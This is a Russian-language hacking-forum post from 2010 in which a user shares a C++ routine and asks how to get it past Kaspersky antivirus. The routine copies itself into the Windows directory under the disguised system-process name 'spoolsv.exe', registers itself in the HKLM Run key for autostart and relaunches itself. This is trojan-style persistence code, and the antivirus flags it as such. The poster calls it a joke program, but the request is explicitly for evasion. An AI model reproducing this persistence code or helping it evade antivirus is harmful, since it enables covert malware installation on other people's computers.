ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Программирование > С/С++, C#, Delphi, .NET, Asm
Перезагрузить страницу Как спопировать файл С++ с обходом kAV
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

Как спопировать файл С++ с обходом kAV
  #1  
Старый 22.02.2010, 13:09
agrofyl2
Познающий
Регистрация: 25.04.2008
Сообщений: 51
Провел на форуме:
146826

Репутация: 17
По умолчанию Как спопировать файл С++ с обходом kAV
Пытаюсь скопировать файлик в папку винды, прописать его в реестр и запустить
Код:
void OnStart() {
   //Получаем путь к своей программе
  wchar_t path[1025]=L"";
  GetModuleFileNameW(NULL, path, 1024);
  
  //Получаем путь для копирования
  wchar_t copy2path[1025]=L"";
  GetWindowsDirectoryW(copy2path, 1024);
  wcscat(copy2path, L"\\spoolsv.exe");
  
  //Сравниваем пути
  if(wcsicmp(path, copy2path)==0) return;
  
  //Либо 1) Еще не скопированы в систему
  //2) Скопированы, но запущено вторично из др. источника
	
  //Если не удалось скопироваться - значит уже скопированы/неудачно скопированы - выходим
  if(!CopyFileW(path, copy2path, 1)) {
    MessageBox(0, "Cant copy", "", 0);
    exit(0);
  }

  //Если скопированы удачно - добавляемся в реестр
  else { 
    HKEY key;//Add In Autorun
    DWORD action;
    if(ERROR_SUCCESS==RegCreateKeyEx(HKEY_LOCAL_MACHINE, __T("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"), 0, NULL,  REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &key, &action))
    {
      RegSetValueExW(key, L"spoolsv", 0, REG_SZ, (LPBYTE)copy2path, lstrlenW(copy2path)*2+1);
      RegCloseKey(key);	
      
      //Добавлено удачно - запускаем программу, а сами выходим
      char forexec[1025]="";
      wcstombs(forexec, copy2path, 1024);
      
      STARTUPINFO si; PROCESS_INFORMATION pi; GetStartupInfo(&si);
      
      if(!CreateProcess(forexec, NULL, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi))
      WinExec(forexec, 0);
      exit(0);
     }
    exit(0);
  }
}
Но касперский пишет: "поведение, похожее на Trojan Generic"
Файл скопирован и добавлен в реестр(непонятно почему), но повторно не запускается(до CreateProcess выполнение не доходит)
Методом исключения было установлено, что антивирус реагирует на строчку CopyFileW

В принципе пишу программу-шутку и универсальность не нужна. Скопировать файл через коммандную строку чтоли?
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Как уничтожить вирус Penetrator? Aikaram Статьи 0 14.06.2009 11:18
Как стать хакером! foreva Болталка 19 12.12.2007 00:12
FAQ по выделенным серверам (Dedicated Servers) byte57 Чужие Статьи 4 16.11.2006 22:03



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ